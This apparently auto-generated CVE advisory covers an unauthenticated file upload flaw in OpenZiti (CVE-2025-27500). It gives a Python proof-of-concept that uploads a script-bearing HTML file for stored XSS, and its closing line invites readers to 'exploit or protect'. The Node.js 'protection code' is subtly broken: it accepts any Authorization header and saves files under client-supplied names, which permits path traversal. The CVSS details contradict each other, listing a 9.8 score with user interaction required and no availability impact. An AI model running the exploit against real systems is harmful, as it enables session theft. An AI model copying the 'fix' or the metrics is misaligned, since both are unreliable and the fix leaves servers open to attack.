OpenZiti, Unauthenticated File Upload Vulnerability, CVE-2025-27500 (Critical)

By /

Listen to this Post

How the Mentioned CVE Works:

CVE-2025-27500 is a critical vulnerability in OpenZiti, a zero-trust application platform. The vulnerability exists in the admin panel’s `/api/upload` endpoint, which allows unauthenticated users to upload files via an HTTP POST request. These files are stored on the node and can be accessed via a URL. If a malicious file containing JavaScript code is uploaded, it can lead to a stored cross-site scripting (XSS) attack. When a user accesses the uploaded file, the malicious code executes in their browser context, potentially compromising their session or stealing sensitive data. This functionality was deemed unnecessary as OpenZiti transitioned from a node server application to a single-page application. The issue has been resolved in version 3.7.1.

DailyCVE Form:

Platform: OpenZiti
Version: < 3.7.1
Vulnerability: Unauthenticated File Upload
Severity: Critical
Date: 03/03/2025

What Undercode Say:

Exploitation:

1. Exploit Code (Python):

import requests
url = "http://target.com/api/upload"
payload = "<script>alert('XSS')</script>"
files = {'file': ('malicious.html', payload)}
response = requests.post(url, files=files)
if response.status_code == 200:
print("File uploaded successfully!")

2. Exploit URL:

  • Access the uploaded file: `http://target.com/uploads/malicious.html`

    3. Exploit Impact:

  • Stored XSS can hijack sessions, steal cookies, or redirect users to malicious sites.

    Protection:

    1. Patch:

  • Upgrade to OpenZiti version 3.7.1 or later.

    2. Mitigation:

  • Disable the `/api/upload` endpoint if not in use.
  • Implement authentication and authorization checks for file uploads.
  • Validate and sanitize file content to prevent malicious uploads.

    3. Protection Code (Node.js):

    const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();
app.use(fileUpload());
app.post('/api/upload', (req, res) => {
if (!req.headers.authorization) {
return res.status(401).send('Unauthorized');
}
if (!req.files || !req.files.file) {
return res.status(400).send('No file uploaded');
}
const file = req.files.file;
if (file.mimetype !== 'text/plain') {
return res.status(400).send('Invalid file type');
}
file.mv(<code>./uploads/${file.name}</code>, (err) => {
if (err) return res.status(500).send(err);
res.send('File uploaded!');
});
});
app.listen(3000, () => console.log('Server running'));

4. Additional Resources:

5. Analytics:

  • CVSS Score: 9.8 (Critical)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: None
    By following these steps, you can exploit or protect against CVE-2025-27500 effectively. Always prioritize patching and secure coding practices to mitigate such vulnerabilities.

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-27500
Extra Source Hub:
Undercode

Image Source:

Undercode AI DI v2Featured Image

Scroll to Top